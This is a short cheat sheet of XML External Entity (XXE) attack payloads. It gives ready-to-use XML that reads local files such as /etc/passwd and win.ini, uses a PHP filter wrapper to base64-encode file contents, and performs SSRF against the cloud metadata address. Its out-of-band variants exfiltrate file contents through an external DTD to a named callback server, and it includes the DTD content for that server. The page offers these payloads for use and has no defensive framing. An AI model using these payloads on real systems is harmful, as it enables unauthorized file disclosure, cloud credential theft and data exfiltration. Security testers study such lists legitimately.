📄 XXE Payloads

Basic File Disclosure (Linux)

Read local files via XXE on Linux systems

<?xml version="1.0"?> <!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]> <root>&test;</root>

Windows File Disclosure

Read Windows system files

<?xml version="1.0"?> <!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/win.ini'>]> <root>&test;</root>

PHP Wrapper XXE

Base64 encode file contents to avoid parsing errors

<?xml version="1.0"?> <!DOCTYPE root [<!ENTITY test SYSTEM 'php://filter/convert.base64-encode/resource=/etc/passwd'>]> <root>&test;</root>

Internal Network SSRF

Make requests to internal services and cloud metadata

<?xml version="1.0"?> <!DOCTYPE root [<!ENTITY test SYSTEM 'http://169.254.169.254/latest/meta-data/'>]> <root>&test;</root>

OOB XXE with External DTD

Exfiltrate data to external callback server

<?xml version="1.0"?> <!DOCTYPE root [<!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % dtd SYSTEM "https://callback.l4ughingm4n.dev/xxe.dtd"> %dtd;]> <root>&send;</root>

Parameter Entity XXE

Use parameter entities for filter bypasses

<?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY % file SYSTEM "file:///etc/hostname"> <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'https://callback.l4ughingm4n.dev/?x=%file;'>"> %eval; %exfil; ]>

External DTD File

Content for xxe.dtd on your callback server

<!ENTITY % data SYSTEM "file:///etc/passwd"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'https://callback.l4ughingm4n.dev/?x=%data;'>">